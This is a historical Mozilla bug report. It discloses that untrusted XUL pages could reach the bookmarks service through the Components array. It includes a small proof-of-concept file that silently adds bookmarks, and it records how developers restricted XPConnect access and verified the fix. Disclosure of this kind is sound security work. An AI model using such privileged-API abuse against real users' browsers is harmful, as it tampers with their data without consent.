Closed Bug 10120 Opened 21 years ago Closed 21 years ago

Adding bookmarks without user's knowledge

Categories

(Core :: Security, defect, P3)

x86
Windows 95
defect

Tracking

()

VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

References

()

Details

Mozilla 5.0 M8 Win95 (guess all platforms) allows adding bookmarks without
user's knowledge.
I do not think this is a good idea, it at least may be used as a DoS attack.
The code is:
-----------------bookm1.xul------------------------------------
<?xml version="1.0"?>
 <!DOCTYPE window>
 <window
   xmlns:html="http://www.w3.org/TR/REC-html40"
   xmlns:xul ="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"
   title = "Adding bookmarks">
 <html:script>
   <![CDATA[

function ab(url, title)
{
    var bmks =
Components.classes["component://netscape/browser/bookmarks-service"].getService(
);
    bmks = bmks.QueryInterface(Components.interfaces.nsIBookmarksService);
    bmks.AddBookmark(url, title);
}

   ab('http://www.netscape.com','script #1');
   ab('http://www.netscape.com','script #2');
   ]]>
  </html:script>

<html:h3> This page adds two bookmarks without user's knowledge. Look at your
bookmarks.
</html:h3>
</window>
---------------------------------------------------------------
Status: NEW → ASSIGNED
This hole should be closed by restricting use of the Components array.
Target Milestone: M11
Blocks: 12633
Depends on: 7261
Component: Browser-General → Security
QA Contact: leger → dshea
Updating QA contact.
Currently mozilla prints "loaded successfully", but no text is displayed in the
window.
I consider this bug fixed by restricting access to the Components array - it
gives the error: "Access denied to XPConnect service" after replacing
"<window" with "<xul:window" and "</window>" with "</xul:window>" in the demo.
Status: ASSIGNED → RESOLVED
Closed: 21 years ago
Resolution: --- → FIXED
I've now checked in changes enabling XPConnect checks.
Status: RESOLVED → VERIFIED
QA Contact: dshea → junruh
Verified fixed.
Blocks: 7252
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General
No longer depends on: 7261
You need to log in before you can comment on or make changes to this bug.